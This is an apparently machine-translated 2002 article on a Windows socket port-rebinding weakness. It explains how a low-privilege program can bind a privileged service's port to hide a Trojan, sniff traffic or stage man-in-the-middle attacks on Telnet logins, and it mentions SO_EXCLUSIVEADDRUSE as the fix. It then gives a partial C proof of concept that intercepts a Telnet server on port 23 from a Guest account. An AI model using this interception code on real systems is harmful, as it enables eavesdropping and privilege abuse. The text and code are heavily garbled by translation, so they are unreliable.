Port interchangeably implementation port hidden, sniffing and attack http://www.jiejingwang.com 2002-11-11 Programming in Windows Socket Server Application, as follows: s = Socket (AF_Inet) , SOCK_STREAM, IPPROTO_TCP); Saddr.sin_Family = AF_INET; Saddr.sin_Addr.s_addr = HTONL (INADDR_Anddr_And (s, (s, (s, (s, (saddr)); in fact this is in a very large security hazard, Because in the implementation of Winsock, the binding of the server can be multi-binded, when determining who is used to use, according to one principle, the designation of who is the most clear, who is submitted to who, and there is no permission division That is to say, the user of low-level privileges can be kept over the port of advanced permissions such as service startup, which is a very significant security hazard. what does this mean? It means that you can perform the following attacks: 1. A Trojan binds to a port that has been legally existing on the port, and he judges his own package through his own specific package format, if it is handled, if it is not handed over to the real server application through 127.0.0.1 Treatment. 2. A Trojan can bind the port of the high-relocation service application, and perform the sniffing of the processing information. The communication that monitors a socket on a host requires very high privilege requirements, but it is actually re-tied with Socket. Declaration, you can easily monitor communication with this Socket programming vulnerability without having to use what hang, hook or low-level drive technology (you need administrator privileges to reach) 3. For some special applications, you can initiate an intermediary attack, get information or fact deception from low-rights users, such as blocking the 23 port of the Telnet server under Guest permission, if you use NTLM encryption certification, although you can't get the password directly Once the admin user logs in, your application can initiate a middle-aged attack, playing this login user to send high privileges through the socket, to the purpose of the invasion. 4. For the build web server, the intruder only needs to get low-level permissions, you can completely change the purpose of change the page, very simple, play your server to the connection request with other information response, or even e-commerce deception, Get illegal data. In fact, the Socket programming of MS own services has such problems, and all of TELNET, FTP, and HTTP's service implementation can be used to attack, and the SYSTEM application is implemented on the low authority user. IIS including W2K SP3 is also the same, then if you can invade or take it with a low authority user, and the other party has opened these services, then you may wish. And I estimate that there are many third-party services that have many of this vulnerability. The solution is very simple. When writing as above, you need to use SetsockOpt to specify SO_EXCLUSIVEADDRUSE asking for exclusive port addresses, not allow multiplexing. This other people cannot be multiplexed. Below is an example of a simple intercept MS Telnet server, you can successfully intercept at Guest users, the remaining is that you have some special tailoring problems based on your own needs: such as hidden, sniffing data, high rights User spoof, etc. #include
#include
#include
#include
DWORD WINAPI ClientThread (LPVOID lpParam); int main () {WORD wVersionRequested; DWORD ret; WSADATA wsaData; BOOL val; SOCKADDR_IN saddr; SOCKADDR_IN scaddr; int err; SOCKET s; SOCKET sc; int caddsize; HANDLE mt; DWORD tid; wVersionRequested = MakeWord (2, 2); Err = WSASTARTUP (WVersionRequested, & WSADATA); if (Err! = 0) {Printf ("Error! WsaStartup Failed! / N"); return -1;} saddr.sin_family = AF_INET; / / Intercept can also specify an address as INADDR_any, but should not affect the normal application, you should specify specific IP, leave 127.0.0.1 to normal service applications, then use this address to forward, you can do not affect the other party SADDR.SIN_ADDR.S_ADDR = INET_ADDR ("192.168.0.60") is applied normally; Saddr.sin_Port = HTONS (23); if ((S = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP) == Socket_ERROR) {Printf ("Error ! socket failed! / n "); return -1;} val = true; // SO_REUSEADDR option is IF (SETSOCKOPT (S, SOL_Socket, So_reuseaddr, (Char *) & Val, SIZEOF (VAL) )! = 0) {PrintF ("Error! SetsockOpt Failed! / N); return -1;} // If you specify SO_EXCLUSIVEADDRUSE, it will not bind success, return the unauthorized error code; // If you want By re-use the port to achieve hidden purposes, you can dynamically test which of the currently bound ports can be successful, indicating this vulnerability, then dynamically utilizing ports to make more hidden // actually UDP ports can be used to bind the use, This is mainly Attack IF (Bind (S, SADDR)) == SOCKET_ERROR) {RETF ("Error! Bind Failed! / N"); 1;} listen (s, 2); while (1) {CaddSize = SIZEOF (SCADDR); // Accept Connection request sc = accept (s, (struct socddr *) & scaddr, & caddsize); if (sc! = Invalid_socket) {MT = CreateThread (NULL, 0, ClientthRead, (LPVOID) SC, 0, & TID); if (MT == Null) {Printf ("Thread Creat Failed! / N"); Break;}} CloseHandle (MT); } CloseSocket (s); wsacleanup (); return 0;